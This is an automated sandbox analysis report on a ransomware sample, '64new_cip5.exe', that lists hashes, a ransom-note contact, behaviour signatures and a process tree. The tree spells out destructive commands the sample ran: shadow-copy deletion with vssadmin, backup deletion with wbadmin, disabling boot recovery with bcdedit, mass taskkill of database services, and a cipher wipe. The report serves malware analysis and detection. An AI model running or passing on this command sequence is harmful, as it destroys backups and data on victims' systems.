Analysis
-
max time kernel
148s -
max time network
181s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2022 11:01
Static task
static1
Behavioral task
behavioral1
Sample
64new_cip5.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
64new_cip5.exe
Resource
win10v2004-20220812-en
General
-
Target
64new_cip5.exe
-
Size
309KB
-
MD5
f1a3a57b1e469f0ecb2674bc8e2ed1f5
-
SHA1
8b51223c1d124a9db8102a510bf469a77682fc3b
-
SHA256
70cd735412950a78b1341edc421441ffc07bd174fbdc42284961346c3cfe213e
-
SHA512
20eda5f143e5e5ae7e7652e7f024ab01be47e747408afa8e7f9036a9829e5ce35575c67ae15ff229aad09f25be728ba6ff72dc5b73b74deb570cb12205451a16
-
SSDEEP
6144:vPLavV9JccWJzcwYuUxhCKrSjZ5pjedRYc4ihyYr+3l0L3WtCyaw7c:v+vV9CZMuUxhC6SjZfjeu++3raw7c
Malware Config
Extracted
\??\A:\!-Recovery_Instructions-!.html
<h2>Mikesupp77@outlook.com</h2>
https://tox.chat/download.html</p>
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
64new_cip5.exedescription pid process target process PID 4308 created 2560 4308 64new_cip5.exe Explorer.EXE -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 4636 bcdedit.exe 1244 bcdedit.exe -
Processes:
wbadmin.exewbadmin.exepid process 4536 wbadmin.exe 1056 wbadmin.exe -
Processes:
wbadmin.exepid process 1288 wbadmin.exe -
Modifies Installed Components in the registry 2 TTPs 1 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
64new_cip5.exedescription ioc process File renamed C:\Users\Admin\Pictures\GroupResolve.png => C:\Users\Admin\Pictures\GroupResolve.png.cipher5 64new_cip5.exe File renamed C:\Users\Admin\Pictures\HideApprove.png => C:\Users\Admin\Pictures\HideApprove.png.cipher5 64new_cip5.exe File renamed C:\Users\Admin\Pictures\LockBackup.raw => C:\Users\Admin\Pictures\LockBackup.raw.cipher5 64new_cip5.exe File renamed C:\Users\Admin\Pictures\LockInitialize.png => C:\Users\Admin\Pictures\LockInitialize.png.cipher5 64new_cip5.exe File opened for modification C:\Users\Admin\Pictures\SendSync.tiff 64new_cip5.exe File renamed C:\Users\Admin\Pictures\SendSync.tiff => C:\Users\Admin\Pictures\SendSync.tiff.cipher5 64new_cip5.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
64new_cip5.exedescription ioc process File opened (read-only) \??\N: 64new_cip5.exe File opened (read-only) \??\T: 64new_cip5.exe File opened (read-only) \??\V: 64new_cip5.exe File opened (read-only) \??\A: 64new_cip5.exe File opened (read-only) \??\G: 64new_cip5.exe File opened (read-only) \??\I: 64new_cip5.exe File opened (read-only) \??\K: 64new_cip5.exe File opened (read-only) \??\M: 64new_cip5.exe File opened (read-only) \??\R: 64new_cip5.exe File opened (read-only) \??\S: 64new_cip5.exe File opened (read-only) \??\E: 64new_cip5.exe File opened (read-only) \??\F: 64new_cip5.exe File opened (read-only) \??\H: 64new_cip5.exe File opened (read-only) \??\O: 64new_cip5.exe File opened (read-only) \??\U: 64new_cip5.exe File opened (read-only) \??\W: 64new_cip5.exe File opened (read-only) \??\X: 64new_cip5.exe File opened (read-only) \??\Y: 64new_cip5.exe File opened (read-only) \??\B: 64new_cip5.exe File opened (read-only) \??\J: 64new_cip5.exe File opened (read-only) \??\L: 64new_cip5.exe File opened (read-only) \??\P: 64new_cip5.exe File opened (read-only) \??\Q: 64new_cip5.exe File opened (read-only) \??\Z: 64new_cip5.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1120 2560 WerFault.exe Explorer.EXE -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1372 vssadmin.exe -
Kills process with taskkill 16 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 928 taskkill.exe 4060 taskkill.exe 528 taskkill.exe 4408 taskkill.exe 5076 taskkill.exe 64 taskkill.exe 2676 taskkill.exe 5116 taskkill.exe 388 taskkill.exe 3008 taskkill.exe 4928 taskkill.exe 5104 taskkill.exe 680 taskkill.exe 3456 taskkill.exe 1524 taskkill.exe 3664 taskkill.exe -
Modifies registry class 2 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2629973501-4017243118-3254762364-1000\{FC0D7F1C-4A64-43C6-B2E9-68D7844338B6} explorer.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
64new_cip5.exepid process 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe 4308 64new_cip5.exe -
Suspicious use of AdjustPrivilegeToken 47 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exevssvc.exeWMIC.exewbengine.exeexplorer.exedescription pid process Token: SeDebugPrivilege 4928 taskkill.exe Token: SeDebugPrivilege 5076 taskkill.exe Token: SeDebugPrivilege 64 taskkill.exe Token: SeDebugPrivilege 1524 taskkill.exe Token: SeDebugPrivilege 2676 taskkill.exe Token: SeDebugPrivilege 3664 taskkill.exe Token: SeDebugPrivilege 5104 taskkill.exe Token: SeDebugPrivilege 680 taskkill.exe Token: SeDebugPrivilege 5116 taskkill.exe Token: SeDebugPrivilege 928 taskkill.exe Token: SeDebugPrivilege 388 taskkill.exe Token: SeDebugPrivilege 4060 taskkill.exe Token: SeDebugPrivilege 3008 taskkill.exe Token: SeDebugPrivilege 528 taskkill.exe Token: SeDebugPrivilege 4408 taskkill.exe Token: SeDebugPrivilege 3456 taskkill.exe Token: SeBackupPrivilege 4296 vssvc.exe Token: SeRestorePrivilege 4296 vssvc.exe Token: SeAuditPrivilege 4296 vssvc.exe Token: SeIncreaseQuotaPrivilege 3940 WMIC.exe Token: SeSecurityPrivilege 3940 WMIC.exe Token: SeTakeOwnershipPrivilege 3940 WMIC.exe Token: SeLoadDriverPrivilege 3940 WMIC.exe Token: SeSystemProfilePrivilege 3940 WMIC.exe Token: SeSystemtimePrivilege 3940 WMIC.exe Token: SeProfSingleProcessPrivilege 3940 WMIC.exe Token: SeIncBasePriorityPrivilege 3940 WMIC.exe Token: SeCreatePagefilePrivilege 3940 WMIC.exe Token: SeBackupPrivilege 3940 WMIC.exe Token: SeRestorePrivilege 3940 WMIC.exe Token: SeShutdownPrivilege 3940 WMIC.exe Token: SeDebugPrivilege 3940 WMIC.exe Token: SeSystemEnvironmentPrivilege 3940 WMIC.exe Token: SeRemoteShutdownPrivilege 3940 WMIC.exe Token: SeUndockPrivilege 3940 WMIC.exe Token: SeManageVolumePrivilege 3940 WMIC.exe Token: 33 3940 WMIC.exe Token: 34 3940 WMIC.exe Token: 35 3940 WMIC.exe Token: 36 3940 WMIC.exe Token: SeBackupPrivilege 3492 wbengine.exe Token: SeRestorePrivilege 3492 wbengine.exe Token: SeSecurityPrivilege 3492 wbengine.exe Token: SeShutdownPrivilege 3612 explorer.exe Token: SeCreatePagefilePrivilege 3612 explorer.exe Token: SeShutdownPrivilege 3612 explorer.exe Token: SeCreatePagefilePrivilege 3612 explorer.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
explorer.exepid process 3612 explorer.exe 3612 explorer.exe -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
explorer.exepid process 3612 explorer.exe 3612 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
64new_cip5.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4308 wrote to memory of 2380 4308 64new_cip5.exe cmd.exe PID 4308 wrote to memory of 2380 4308 64new_cip5.exe cmd.exe PID 4308 wrote to memory of 2380 4308 64new_cip5.exe cmd.exe PID 2380 wrote to memory of 4208 2380 cmd.exe cmd.exe PID 2380 wrote to memory of 4208 2380 cmd.exe cmd.exe PID 4308 wrote to memory of 4956 4308 64new_cip5.exe cmd.exe PID 4308 wrote to memory of 4956 4308 64new_cip5.exe cmd.exe PID 4308 wrote to memory of 4956 4308 64new_cip5.exe cmd.exe PID 4956 wrote to memory of 4904 4956 cmd.exe cmd.exe PID 4956 wrote to memory of 4904 4956 cmd.exe cmd.exe PID 4904 wrote to memory of 4928 4904 cmd.exe taskkill.exe PID 4904 wrote to memory of 4928 4904 cmd.exe taskkill.exe PID 4308 wrote to memory of 1372 4308 64new_cip5.exe cmd.exe PID 4308 wrote to memory of 1372 4308 64new_cip5.exe cmd.exe PID 4308 wrote to memory of 1372 4308 64new_cip5.exe cmd.exe PID 1372 wrote to memory of 384 1372 cmd.exe cmd.exe PID 1372 wrote to memory of 384 1372 cmd.exe cmd.exe PID 384 wrote to memory of 5076 384 cmd.exe taskkill.exe PID 384 wrote to memory of 5076 384 cmd.exe taskkill.exe PID 4308 wrote to memory of 4840 4308 64new_cip5.exe cmd.exe PID 4308 wrote to memory of 4840 4308 64new_cip5.exe cmd.exe PID 4308 wrote to memory of 4840 4308 64new_cip5.exe cmd.exe PID 4840 wrote to memory of 2324 4840 cmd.exe cmd.exe PID 4840 wrote to memory of 2324 4840 cmd.exe cmd.exe PID 2324 wrote to memory of 64 2324 cmd.exe taskkill.exe PID 2324 wrote to memory of 64 2324 cmd.exe taskkill.exe PID 4308 wrote to memory of 4240 4308 64new_cip5.exe cmd.exe PID 4308 wrote to memory of 4240 4308 64new_cip5.exe cmd.exe PID 4308 wrote to memory of 4240 4308 64new_cip5.exe cmd.exe PID 4240 wrote to memory of 1132 4240 cmd.exe cmd.exe PID 4240 wrote to memory of 1132 4240 cmd.exe cmd.exe PID 1132 wrote to memory of 1524 1132 cmd.exe taskkill.exe PID 1132 wrote to memory of 1524 1132 cmd.exe taskkill.exe PID 4308 wrote to memory of 2492 4308 64new_cip5.exe cmd.exe PID 4308 wrote to memory of 2492 4308 64new_cip5.exe cmd.exe PID 4308 wrote to memory of 2492 4308 64new_cip5.exe cmd.exe PID 2492 wrote to memory of 2392 2492 cmd.exe cmd.exe PID 2492 wrote to memory of 2392 2492 cmd.exe cmd.exe PID 2392 wrote to memory of 2676 2392 cmd.exe taskkill.exe PID 2392 wrote to memory of 2676 2392 cmd.exe taskkill.exe PID 4308 wrote to memory of 3560 4308 64new_cip5.exe cmd.exe PID 4308 wrote to memory of 3560 4308 64new_cip5.exe cmd.exe PID 4308 wrote to memory of 3560 4308 64new_cip5.exe cmd.exe PID 3560 wrote to memory of 2840 3560 cmd.exe cmd.exe PID 3560 wrote to memory of 2840 3560 cmd.exe cmd.exe PID 2840 wrote to memory of 3664 2840 cmd.exe taskkill.exe PID 2840 wrote to memory of 3664 2840 cmd.exe taskkill.exe PID 4308 wrote to memory of 3572 4308 64new_cip5.exe cmd.exe PID 4308 wrote to memory of 3572 4308 64new_cip5.exe cmd.exe PID 4308 wrote to memory of 3572 4308 64new_cip5.exe cmd.exe PID 3572 wrote to memory of 624 3572 cmd.exe cmd.exe PID 3572 wrote to memory of 624 3572 cmd.exe cmd.exe PID 624 wrote to memory of 5104 624 cmd.exe taskkill.exe PID 624 wrote to memory of 5104 624 cmd.exe taskkill.exe PID 4308 wrote to memory of 4336 4308 64new_cip5.exe cmd.exe PID 4308 wrote to memory of 4336 4308 64new_cip5.exe cmd.exe PID 4308 wrote to memory of 4336 4308 64new_cip5.exe cmd.exe PID 4336 wrote to memory of 3312 4336 cmd.exe cmd.exe PID 4336 wrote to memory of 3312 4336 cmd.exe cmd.exe PID 3312 wrote to memory of 680 3312 cmd.exe taskkill.exe PID 3312 wrote to memory of 680 3312 cmd.exe taskkill.exe PID 4308 wrote to memory of 920 4308 64new_cip5.exe cmd.exe PID 4308 wrote to memory of 920 4308 64new_cip5.exe cmd.exe PID 4308 wrote to memory of 920 4308 64new_cip5.exe cmd.exe -
System policy modification 1 TTPs 4 IoCs
Processes:
64new_cip5.exe64new_cip5.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 64new_cip5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 64new_cip5.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 64new_cip5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 64new_cip5.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\64new_cip5.exe"C:\Users\Admin\AppData\Local\Temp\64new_cip5.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Modifies extensions of user files
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c rem Kill "SQL"4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlbrowser.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlwriter.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlwriter.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlwriter.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlservr.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im msmdsrv.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im MsDtsSrvr.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlceip.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im fdlauncher.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im SQLAGENT.EXE5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im fdhost.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlservr.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im ReportingServicesService.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im msftesql.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im pg_ctl.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im postgres.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im postgres.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im postgres.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper1003⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper1004⤵
-
C:\Windows\system32\net.exenet stop MSSQLServerADHelper1005⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1006⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$ISARS5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ISARS6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$MSFW5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$MSFW6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$ISARS5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ISARS6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP5⤵
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP6⤵
- Deletes System State backups
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$MSFW5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$MSFW6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLBrowser4⤵
-
C:\Windows\system32\net.exenet stop SQLBrowser5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop ReportServer$ISARS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop ReportServer$ISARS4⤵
-
C:\Windows\system32\net.exenet stop ReportServer$ISARS5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$ISARS6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLWriter4⤵
-
C:\Windows\system32\net.exenet stop SQLWriter5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet4⤵
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet5⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersions:0 -quiet3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersions:0 -quiet4⤵
-
C:\Windows\system32\wbadmin.exewbadmin delete backup -keepVersions:0 -quiet5⤵
- Deletes system backups
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest4⤵
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest5⤵
- Deletes System State backups
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe SHADOWCOPY /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoveryenabled No3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoveryenabled No4⤵
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled No5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures4⤵
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\SysWOW64\cipher.execipher /w:\\?\C:3⤵
-
